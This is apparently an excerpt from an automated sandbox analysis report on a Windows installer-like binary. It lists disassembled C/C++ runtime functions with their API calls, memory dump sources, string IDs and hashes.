                                                            • std::ios_base::_Addstd.LIBCPMT ref: 6CAE211B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                            • API String ID: 3332196525-1866435925
                                                            • Opcode ID: 9d50bad52c31cd4c1982d27629181c6351e0ddb4cc871c148b25e0c5d697b095
                                                            • Instruction ID: c3a87a59d35137d4d280d12383240964fc5fffe115b91ab035c123569a17377f
                                                            • Opcode Fuzzy Hash: 9d50bad52c31cd4c1982d27629181c6351e0ddb4cc871c148b25e0c5d697b095
                                                            • Instruction Fuzzy Hash: 4C41A0B1A0034A8FDB00CF64D8457AABBB1FF48318F148268E919AB791E775D985CBD1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC74ECC
                                                              • Part of subcall function 6CC5F58A: __EH_prolog.LIBCMT ref: 6CC5F58F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: :hJ$dJ$xJ
                                                            • API String ID: 3519838083-2437443688
                                                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                            • Instruction ID: 6edf1d88b6ff90497481ee987eee6d8616ab23d75f623b269e7a81d8aa5416a8
                                                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                            • Instruction Fuzzy Hash: 5F21ECB1805B40CFC760CF6AC14428ABBF4FF69708B50C96EC1AA97B11E7B8A508CF55
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CC2B0D0,6CAE1DEA,00008000,6CC2B0D0,?,?,?,6CC2AC7F,6CC2B0D0,?,00000000,6CAE1DEA), ref: 6CC2ADC9
                                                            • GetLastError.KERNEL32(?,?,?,6CC2AC7F,6CC2B0D0,?,00000000,6CAE1DEA,?,6CC3469E,6CC2B0D0,000000FF,000000FF,00000002,00008000,6CC2B0D0), ref: 6CC2ADD3
                                                            • __dosmaperr.LIBCMT ref: 6CC2ADDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                            • String ID: 8Q
                                                            • API String ID: 2336955059-4022487301
                                                            • Opcode ID: 35b02b5c17c6af6773bb8dbece32e6ddc0c3c2e78824114733bb47bab3737c47
                                                            • Instruction ID: b0a3403ca604ae3de56c1eb41090191069d74c908dc632c20fe9f956b00a73dd
                                                            • Opcode Fuzzy Hash: 35b02b5c17c6af6773bb8dbece32e6ddc0c3c2e78824114733bb47bab3737c47
                                                            • Instruction Fuzzy Hash: 9401F733714515AFCF059FAACC059DE7B39EBC6325F384288E8119B680FB75D9018BA0
                                                            APIs
                                                            • GetLastError.KERNEL32(00000008,?,00000000,6CC28453), ref: 6CC249B7
                                                            • _free.LIBCMT ref: 6CC24A14
                                                            • _free.LIBCMT ref: 6CC24A4A
                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CC24A55
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast_free
                                                            • String ID:
                                                            • API String ID: 2283115069-0
                                                            • Opcode ID: 4f9f194688982e0f6629539d7ea6fe70dbb2e4b30054aab67ac04769782dfedf
                                                            • Instruction ID: f8517e21a4bf31267f81d183e625ed6a757e16f8b9a20d035ac6bbb6cfd4f00f
                                                            • Opcode Fuzzy Hash: 4f9f194688982e0f6629539d7ea6fe70dbb2e4b30054aab67ac04769782dfedf
                                                            • Instruction Fuzzy Hash: 8311CA32704601ABEB01EEB95CC5D5A257DABC277C7250625F634A7FC0FF2D8C495124
                                                            APIs
                                                            • WriteConsoleW.KERNEL32(00000000,?,6CC346EC,00000000,00000000,?,6CC34B51,00000000,00000001,00000000,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0), ref: 6CC35ED1
                                                            • GetLastError.KERNEL32(?,6CC34B51,00000000,00000001,00000000,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0,?,6CC2B0D0,?,6CC2BD1C,6CC35AB6), ref: 6CC35EDD
                                                              • Part of subcall function 6CC35F2E: CloseHandle.KERNEL32(FFFFFFFE,6CC35EED,?,6CC34B51,00000000,00000001,00000000,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0,?,6CC2B0D0), ref: 6CC35F3E
                                                            • ___initconout.LIBCMT ref: 6CC35EED
                                                              • Part of subcall function 6CC35F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CC35EAB,6CC34B3E,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0,?), ref: 6CC35F22
                                                            • WriteConsoleW.KERNEL32(00000000,?,6CC346EC,00000000,?,6CC34B51,00000000,00000001,00000000,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0,?), ref: 6CC35F02
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                            • String ID:
                                                            • API String ID: 2744216297-0
                                                            • Opcode ID: 6a409476853ea9fe065c8472ef88824304d5c88cd2dc96d785eb066b63496c07
                                                            • Instruction ID: 409dd46df1499e7e567f1bc14c1c70340c376ce86613e6cdb136c47c334990e1
                                                            • Opcode Fuzzy Hash: 6a409476853ea9fe065c8472ef88824304d5c88cd2dc96d785eb066b63496c07
                                                            • Instruction Fuzzy Hash: F5F0AC3A600225BBCF126FA5EC049C93F36FB097A5B189550FA1996620DB32C825DB90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_
                                                            • String ID: 8Q
                                                            • API String ID: 2427045233-4022487301
                                                            • Opcode ID: 6a205434802f58a230b7a63387d3b17a732e23ab906800b611deaac446b37141
                                                            • Instruction ID: 11303831dda992be2867e77545a65f8530ac482fcd83e4cc8e75d078861b264c
                                                            • Opcode Fuzzy Hash: 6a205434802f58a230b7a63387d3b17a732e23ab906800b611deaac446b37141
                                                            • Instruction Fuzzy Hash: C071A371D052569FDB108F96C884AEE7BBDBF45318F1C4229E920A7A40FF798947CB60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC68C5D
                                                              • Part of subcall function 6CC6761A: __EH_prolog.LIBCMT ref: 6CC6761F
                                                              • Part of subcall function 6CC67A2E: __EH_prolog.LIBCMT ref: 6CC67A33
                                                              • Part of subcall function 6CC68EA5: __EH_prolog.LIBCMT ref: 6CC68EAA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: WZJ
                                                            • API String ID: 3519838083-1089469559
                                                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                            • Instruction ID: e9b9b5701c863c0f5671f18d2aa8b7d446014358b809268feac90f724a3623e4
                                                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                            • Instruction Fuzzy Hash: 94818C31D00159DFCF15DFA5DA90ADDB7B4AF19318F10809AE502B7BA0EB30AE09CB60
                                                            APIs
                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6CAE2A76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ___std_exception_destroy
                                                            • String ID: Jbx$Jbx
                                                            • API String ID: 4194217158-1161259238
                                                            • Opcode ID: 1207350f1391095ca387c9c024334eb45c769006bc0cd3943af905c0ce782d88
                                                            • Instruction ID: 4a316ff4207d29c8ffb30c84d5f8e80bc0fc5f87ad0244c0dfc98ccbd91dd2c7
                                                            • Opcode Fuzzy Hash: 1207350f1391095ca387c9c024334eb45c769006bc0cd3943af905c0ce782d88
                                                            • Instruction Fuzzy Hash: A45124B19002058FCB10CF69D884A9EBBB5FF89314F15866EE8499BB41E331D9C5DBD2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: CK$CK
                                                            • API String ID: 3519838083-2096518401
                                                            • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                            • Instruction ID: bf5cfe0e4e77e41be1d65e7afe0551b7f9083573ffe52269f7cc8387e8fd30d2
                                                            • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                            • Instruction Fuzzy Hash: 46518C75A00705DFDB40CFA5C8C0BEEB3B5FB88758F158529D901EBA81EB74E9058BA0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CC346D6), ref: 6CC2D01B
                                                            • __dosmaperr.LIBCMT ref: 6CC2D022
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr
                                                            • String ID: 8Q
                                                            • API String ID: 1659562826-4022487301
                                                            • Opcode ID: b21e4fd4fa3df4c256f71733e228a7b5a00f7f66b0e4ce987025dc06d6e78c5a
                                                            • Instruction ID: e7e80d4506c6f0ecafd2c1c6f9c7c6908ee5ab8286ae3afa0726352610046a50
                                                            • Opcode Fuzzy Hash: b21e4fd4fa3df4c256f71733e228a7b5a00f7f66b0e4ce987025dc06d6e78c5a
                                                            • Instruction Fuzzy Hash: 2C419B71614194AFE721EF6DC880BA9BFE5FF46314F244259E8808BA41F379DD16C790
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: 0|J$`)L
                                                            • API String ID: 3519838083-117937767
                                                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                            • Instruction ID: 8b9e880a648d79117e45a7abce42fdb5c4dfd394012add693b99b00e930c4b83
                                                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                            • Instruction Fuzzy Hash: 05418F31602745EFCB11CF64C5A0BEBBBEAFF45208F04846EE45A97B50EB31A905CB91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: @$LuJ
                                                            • API String ID: 3519838083-205571748
                                                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                            • Instruction ID: c9ea835f0f6db484c7346abfd189aaf92b7fb8b8d0a9ce612a11877a1c274790
                                                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                            • Instruction Fuzzy Hash: F80184B2E02349DADB10DF9988805AFFBB4FF59708F40842EE569E3A41E3745904CB59
                                                            APIs
                                                            • _free.LIBCMT ref: 6CC2DD49
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CC2A63A,?,00000004,?,4B42FCB6,?,?,6CC1F78C,4B42FCB6,?), ref: 6CC2DD85
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap_free
                                                            • String ID: 8Q
                                                            • API String ID: 1080816511-4022487301
                                                            • Opcode ID: 2b0831dc230305c20008f2042316344fd3af67af5ee8e000d88a2a9d398bc56f
                                                            • Instruction ID: 67fd07d8b87d8d5391466503e12ab5abda298955e84e8c5990a1bd58b191906d
                                                            • Opcode Fuzzy Hash: 2b0831dc230305c20008f2042316344fd3af67af5ee8e000d88a2a9d398bc56f
                                                            • Instruction Fuzzy Hash: 01F0F632605A556BDB211E27AC40B9A37689FD3B78F254195F964ABE90FF2CD401C1F0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: p/K$J
                                                            • API String ID: 3519838083-2069324279
                                                            • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                            • Instruction ID: 6a9cebe8ebc7f3db7c2434022db1a9ebd9cdba5c155df28b1d26bb8d52489ef7
                                                            • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                            • Instruction Fuzzy Hash: 0401BCB2A117119FD724CF99C5047AAB7F8EF45729F10C81E9062A3B40D7F8A5088BA4
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC8AFCC
                                                              • Part of subcall function 6CC8A4D1: __EH_prolog.LIBCMT ref: 6CC8A4D6
                                                              • Part of subcall function 6CC8914B: __EH_prolog.LIBCMT ref: 6CC89150
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: J$0J
                                                            • API String ID: 3519838083-2882003284
                                                            • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                            • Instruction ID: 4a98b72c75123753beac9f67a0d961e6301b9730aae78937ac22fe023952123c
                                                            • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                            • Instruction Fuzzy Hash: 900105B1805B50CFC325CF55C5A428AFBE0BB15308F90C95EC0A657B50E7B8A508CB68
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D)K$H)K$P)K$T)K
                                                            • API String ID: 0-2262112463
                                                            • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                            • Instruction ID: ee475fb7c68c3f1aace00a23b3a1e8d5e18c8e66a727c4201b015733077c0e91
                                                            • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                            • Instruction Fuzzy Hash: AE51DC7090420A9FCF11CFA5DD44ADEB7B5BF4932CF10D02AE81167A81FB71A94ACB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (?K$8?K$H?K$CK
                                                            • API String ID: 0-3450752836
                                                            • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                            • Instruction ID: 10b4a97090a0e5bb5fa2235a1bff72515717fba06b68384084b260cd31cced29
                                                            • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                            • Instruction Fuzzy Hash: 22F030B06117009FC320CF05D54879BF7F4EB46709F50CD1EE19A9BA40D3B8A5088FA9